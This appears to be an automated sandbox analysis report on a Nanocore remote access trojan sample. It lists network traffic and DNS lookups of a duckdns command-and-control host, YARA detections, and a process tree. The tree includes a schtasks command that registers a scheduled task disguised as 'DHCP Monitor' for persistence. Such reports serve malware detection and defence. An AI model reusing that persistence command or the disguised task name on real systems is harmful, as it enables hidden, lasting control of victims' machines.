        Apr 8, 2021 10:32:48.049357891 CEST497131896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:48.389399052 CEST189649713192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:48.389750957 CEST497131896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:48.390371084 CEST497131896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:48.872243881 CEST189649713192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:52.928529978 CEST497181896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:53.419503927 CEST189649718192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:53.419634104 CEST497181896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:53.420094967 CEST497181896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:53.822801113 CEST189649718192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:57.876168966 CEST497211896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:57.978488922 CEST804968293.184.220.29192.168.2.7
        Apr 8, 2021 10:32:57.978617907 CEST4968280192.168.2.793.184.220.29
        Apr 8, 2021 10:32:58.064646959 CEST189649721192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:58.064788103 CEST497211896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:58.065521002 CEST497211896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:58.548778057 CEST189649721192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:59.263700962 CEST804967793.184.220.29192.168.2.7
        Apr 8, 2021 10:32:59.263811111 CEST4967780192.168.2.793.184.220.29
        Apr 8, 2021 10:33:02.367469072 CEST49687443192.168.2.7204.79.197.200
        Apr 8, 2021 10:33:02.368303061 CEST49686443192.168.2.7204.79.197.200
        Apr 8, 2021 10:33:18.732800007 CEST497331896192.168.2.7192.169.69.26

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Apr 8, 2021 10:32:02.786127090 CEST6245253192.168.2.78.8.8.8
        Apr 8, 2021 10:32:02.798441887 CEST53624528.8.8.8192.168.2.7
        Apr 8, 2021 10:32:03.567867994 CEST5782053192.168.2.78.8.8.8
        Apr 8, 2021 10:32:03.581139088 CEST53578208.8.8.8192.168.2.7
        Apr 8, 2021 10:32:04.562305927 CEST5084853192.168.2.78.8.8.8
        Apr 8, 2021 10:32:04.575906038 CEST53508488.8.8.8192.168.2.7
        Apr 8, 2021 10:32:05.272747040 CEST6124253192.168.2.78.8.8.8
        Apr 8, 2021 10:32:05.290477991 CEST53612428.8.8.8192.168.2.7
        Apr 8, 2021 10:32:05.380604982 CEST5856253192.168.2.78.8.8.8
        Apr 8, 2021 10:32:05.395935059 CEST53585628.8.8.8192.168.2.7
        Apr 8, 2021 10:32:16.614500999 CEST5659053192.168.2.78.8.8.8
        Apr 8, 2021 10:32:16.822741032 CEST53565908.8.8.8192.168.2.7
        Apr 8, 2021 10:32:20.267795086 CEST6050153192.168.2.78.8.8.8
        Apr 8, 2021 10:32:20.280529022 CEST53605018.8.8.8192.168.2.7
        Apr 8, 2021 10:32:21.323401928 CEST5377553192.168.2.78.8.8.8
        Apr 8, 2021 10:32:21.335855961 CEST53537758.8.8.8192.168.2.7
        Apr 8, 2021 10:32:21.873720884 CEST5183753192.168.2.78.8.8.8
        Apr 8, 2021 10:32:22.053880930 CEST53518378.8.8.8192.168.2.7
        Apr 8, 2021 10:32:26.820271015 CEST5541153192.168.2.78.8.8.8
        Apr 8, 2021 10:32:26.833659887 CEST53554118.8.8.8192.168.2.7
        Apr 8, 2021 10:32:29.145986080 CEST6366853192.168.2.78.8.8.8
        Apr 8, 2021 10:32:29.183234930 CEST53636688.8.8.8192.168.2.7
        Apr 8, 2021 10:32:32.755903006 CEST5464053192.168.2.78.8.8.8
        Apr 8, 2021 10:32:32.768488884 CEST53546408.8.8.8192.168.2.7
        Apr 8, 2021 10:32:34.662729979 CEST5873953192.168.2.78.8.8.8
        Apr 8, 2021 10:32:34.676779985 CEST53587398.8.8.8192.168.2.7
        Apr 8, 2021 10:32:36.228038073 CEST6033853192.168.2.78.8.8.8
        Apr 8, 2021 10:32:36.241520882 CEST53603388.8.8.8192.168.2.7
        Apr 8, 2021 10:32:38.171065092 CEST5871753192.168.2.78.8.8.8
        Apr 8, 2021 10:32:38.183824062 CEST53587178.8.8.8192.168.2.7
        Apr 8, 2021 10:32:39.270759106 CEST5976253192.168.2.78.8.8.8
        Apr 8, 2021 10:32:39.283071041 CEST53597628.8.8.8192.168.2.7
        Apr 8, 2021 10:32:41.050035000 CEST5432953192.168.2.78.8.8.8
        Apr 8, 2021 10:32:41.062252045 CEST53543298.8.8.8192.168.2.7
        Apr 8, 2021 10:32:48.033740044 CEST5805253192.168.2.78.8.8.8
        Apr 8, 2021 10:32:48.047174931 CEST53580528.8.8.8192.168.2.7
        Apr 8, 2021 10:32:48.176076889 CEST5400853192.168.2.78.8.8.8
        Apr 8, 2021 10:32:48.189219952 CEST53540088.8.8.8192.168.2.7
        Apr 8, 2021 10:32:48.964936018 CEST5945153192.168.2.78.8.8.8
        Apr 8, 2021 10:32:48.976780891 CEST53594518.8.8.8192.168.2.7
        Apr 8, 2021 10:32:49.888151884 CEST5291453192.168.2.78.8.8.8
        Apr 8, 2021 10:32:49.905787945 CEST53529148.8.8.8192.168.2.7
        Apr 8, 2021 10:32:49.976938009 CEST6456953192.168.2.78.8.8.8
        Apr 8, 2021 10:32:49.989473104 CEST53645698.8.8.8192.168.2.7
        Apr 8, 2021 10:32:52.913947105 CEST5281653192.168.2.78.8.8.8
        Apr 8, 2021 10:32:52.927352905 CEST53528168.8.8.8192.168.2.7
        Apr 8, 2021 10:32:56.064374924 CEST5078153192.168.2.78.8.8.8
        Apr 8, 2021 10:32:56.076932907 CEST53507818.8.8.8192.168.2.7
        Apr 8, 2021 10:32:57.192718983 CEST5423053192.168.2.78.8.8.8
        Apr 8, 2021 10:32:57.206015110 CEST53542308.8.8.8192.168.2.7
        Apr 8, 2021 10:32:57.861795902 CEST5491153192.168.2.78.8.8.8
        Apr 8, 2021 10:32:57.874805927 CEST53549118.8.8.8192.168.2.7
        Apr 8, 2021 10:32:58.219041109 CEST4995853192.168.2.78.8.8.8
        Apr 8, 2021 10:32:58.237343073 CEST53499588.8.8.8192.168.2.7
        Apr 8, 2021 10:33:05.915371895 CEST5086053192.168.2.78.8.8.8
        Apr 8, 2021 10:33:05.928728104 CEST53508608.8.8.8192.168.2.7
        Apr 8, 2021 10:33:07.046422005 CEST5045253192.168.2.78.8.8.8
        Apr 8, 2021 10:33:07.059804916 CEST53504528.8.8.8192.168.2.7
        Apr 8, 2021 10:33:08.576507092 CEST5973053192.168.2.78.8.8.8
        Apr 8, 2021 10:33:08.589214087 CEST53597308.8.8.8192.168.2.7
        Apr 8, 2021 10:33:10.074204922 CEST5931053192.168.2.78.8.8.8
        Apr 8, 2021 10:33:10.086838007 CEST53593108.8.8.8192.168.2.7
        Apr 8, 2021 10:33:14.940850973 CEST5191953192.168.2.78.8.8.8
        Apr 8, 2021 10:33:14.953679085 CEST53519198.8.8.8192.168.2.7
        Apr 8, 2021 10:33:18.536197901 CEST6429653192.168.2.78.8.8.8
        Apr 8, 2021 10:33:18.730227947 CEST53642968.8.8.8192.168.2.7
        Apr 8, 2021 10:33:20.633111000 CEST5668053192.168.2.78.8.8.8
        Apr 8, 2021 10:33:20.650660992 CEST53566808.8.8.8192.168.2.7
        Apr 8, 2021 10:33:23.681402922 CEST5882053192.168.2.78.8.8.8
        Apr 8, 2021 10:33:23.862888098 CEST53588208.8.8.8192.168.2.7
        Apr 8, 2021 10:33:28.578886986 CEST6098353192.168.2.78.8.8.8
        Apr 8, 2021 10:33:28.592192888 CEST53609838.8.8.8192.168.2.7
        Apr 8, 2021 10:33:39.000116110 CEST4924753192.168.2.78.8.8.8
        Apr 8, 2021 10:33:39.242897034 CEST53492478.8.8.8192.168.2.7
        Apr 8, 2021 10:33:39.766458988 CEST5228653192.168.2.78.8.8.8
        Apr 8, 2021 10:33:39.846417904 CEST53522868.8.8.8192.168.2.7
        Apr 8, 2021 10:33:40.329471111 CEST5606453192.168.2.78.8.8.8
        Apr 8, 2021 10:33:40.342735052 CEST53560648.8.8.8192.168.2.7
        Apr 8, 2021 10:33:40.736736059 CEST6374453192.168.2.78.8.8.8
        Apr 8, 2021 10:33:40.749739885 CEST53637448.8.8.8192.168.2.7
        Apr 8, 2021 10:33:41.117456913 CEST6145753192.168.2.78.8.8.8
        Apr 8, 2021 10:33:41.130691051 CEST53614578.8.8.8192.168.2.7
        Apr 8, 2021 10:33:41.365665913 CEST5836753192.168.2.78.8.8.8
        Apr 8, 2021 10:33:41.438338041 CEST53583678.8.8.8192.168.2.7
        Apr 8, 2021 10:33:41.867042065 CEST6059953192.168.2.78.8.8.8
        Apr 8, 2021 10:33:41.901357889 CEST53605998.8.8.8192.168.2.7
        Apr 8, 2021 10:33:41.923307896 CEST5957153192.168.2.78.8.8.8
        Apr 8, 2021 10:33:41.935909986 CEST53595718.8.8.8192.168.2.7
        Apr 8, 2021 10:33:42.286048889 CEST5268953192.168.2.78.8.8.8
        Apr 8, 2021 10:33:42.299371958 CEST53526898.8.8.8192.168.2.7
        Apr 8, 2021 10:33:42.892843962 CEST5029053192.168.2.78.8.8.8
        Apr 8, 2021 10:33:42.906069994 CEST53502908.8.8.8192.168.2.7
        Apr 8, 2021 10:33:43.557033062 CEST6042753192.168.2.78.8.8.8
        Apr 8, 2021 10:33:43.570374966 CEST53604278.8.8.8192.168.2.7
        Apr 8, 2021 10:33:44.121943951 CEST5620953192.168.2.78.8.8.8
        Apr 8, 2021 10:33:44.134443045 CEST53562098.8.8.8192.168.2.7
        Apr 8, 2021 10:33:48.882797956 CEST5958253192.168.2.78.8.8.8
        Apr 8, 2021 10:33:48.895253897 CEST53595828.8.8.8192.168.2.7
        Apr 8, 2021 10:33:54.018465996 CEST6094953192.168.2.78.8.8.8
        Apr 8, 2021 10:33:54.031763077 CEST53609498.8.8.8192.168.2.7
        Apr 8, 2021 10:33:59.161456108 CEST5854253192.168.2.78.8.8.8
        Apr 8, 2021 10:33:59.174904108 CEST53585428.8.8.8192.168.2.7
        Apr 8, 2021 10:34:19.756982088 CEST5917953192.168.2.78.8.8.8
        Apr 8, 2021 10:34:19.936049938 CEST53591798.8.8.8192.168.2.7

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
        Apr 8, 2021 10:32:16.614500999 CEST192.168.2.78.8.8.80xa866Standard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:32:21.873720884 CEST192.168.2.78.8.8.80x4513Standard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:32:26.820271015 CEST192.168.2.78.8.8.80x9fcfStandard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:32:48.033740044 CEST192.168.2.78.8.8.80x5fb1Standard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:32:52.913947105 CEST192.168.2.78.8.8.80xdf7bStandard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:32:57.861795902 CEST192.168.2.78.8.8.80xba79Standard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:33:18.536197901 CEST192.168.2.78.8.8.80xaad2Standard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:33:23.681402922 CEST192.168.2.78.8.8.80xb6ddStandard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:33:28.578886986 CEST192.168.2.78.8.8.80xc23eStandard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:33:48.882797956 CEST192.168.2.78.8.8.80x92c6Standard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:33:54.018465996 CEST192.168.2.78.8.8.80xdef1Standard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:33:59.161456108 CEST192.168.2.78.8.8.80x66feStandard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)
        Apr 8, 2021 10:34:19.756982088 CEST192.168.2.78.8.8.80x7dStandard query (0)nickdns22.duckdns.orgA (IP address)IN (0x0001)

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
        Apr 8, 2021 10:32:16.822741032 CEST8.8.8.8192.168.2.70xa866No error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:32:22.053880930 CEST8.8.8.8192.168.2.70x4513No error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:32:26.833659887 CEST8.8.8.8192.168.2.70x9fcfNo error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:32:48.047174931 CEST8.8.8.8192.168.2.70x5fb1No error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:32:52.927352905 CEST8.8.8.8192.168.2.70xdf7bNo error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:32:57.874805927 CEST8.8.8.8192.168.2.70xba79No error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:33:18.730227947 CEST8.8.8.8192.168.2.70xaad2No error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:33:23.862888098 CEST8.8.8.8192.168.2.70xb6ddNo error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:33:28.592192888 CEST8.8.8.8192.168.2.70xc23eNo error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:33:48.895253897 CEST8.8.8.8192.168.2.70x92c6No error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:33:54.031763077 CEST8.8.8.8192.168.2.70xdef1No error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:33:59.174904108 CEST8.8.8.8192.168.2.70x66feNo error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)
        Apr 8, 2021 10:34:19.936049938 CEST8.8.8.8192.168.2.70x7dNo error (0)nickdns22.duckdns.org192.169.69.26A (IP address)IN (0x0001)

        Code Manipulations

        Statistics

        Behavior

        Click to jump to process

        System Behavior

        Analysis Process: qnJXJsqt1M.exe PID: 2764 Parent PID: 5804

        General

        Start time:10:32:09
        Start date:08/04/2021
        Path:C:\Users\user\Desktop\qnJXJsqt1M.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\Desktop\qnJXJsqt1M.exe'
        Imagebase:0xad0000
        File size:1253376 bytes
        MD5 hash:E98CE8A425D942E7337ECBD309707E25
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Reputation:low

        Analysis Process: MSBuild.exe PID: 4156 Parent PID: 2764

        General

        Start time:10:32:12
        Start date:08/04/2021
        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Imagebase:0xb20000
        File size:69632 bytes
        MD5 hash:88BBB7610152B48C2B3879473B17857E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Yara matches:
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Reputation:moderate

        Analysis Process: schtasks.exe PID: 2164 Parent PID: 4156

        General

        Start time:10:32:14
        Start date:08/04/2021
        Path:C:\Windows\SysWOW64\schtasks.exe
        Wow64 process (32bit):true
        Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Imagebase:0x340000
        File size:185856 bytes
        MD5 hash:15FF7D8324231381BAD48A052F85DF04
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Analysis Process: conhost.exe PID: 496 Parent PID: 2164

        General

        Start time:10:32:14
        Start date:08/04/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff774ee0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Analysis Process: MSBuild.exe PID: 3544 Parent PID: 1104

        General

        Start time:10:32:15
        Start date:08/04/2021
        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
        Imagebase:0x950000
        File size:69632 bytes
        MD5 hash:88BBB7610152B48C2B3879473B17857E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Reputation:moderate

        Analysis Process: conhost.exe PID: 5484 Parent PID: 3544

        General

        Start time:10:32:15
        Start date:08/04/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff774ee0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Analysis Process: znytpstdcrwsisx.exe PID: 3192 Parent PID: 3292

        General

        Start time:10:32:23
        Start date:08/04/2021
        Path:C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe'
        Imagebase:0xd50000
        File size:1253382 bytes
        MD5 hash:206B9BA9B804BD72DB71AEBAB5967567
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, Author: Joe Security
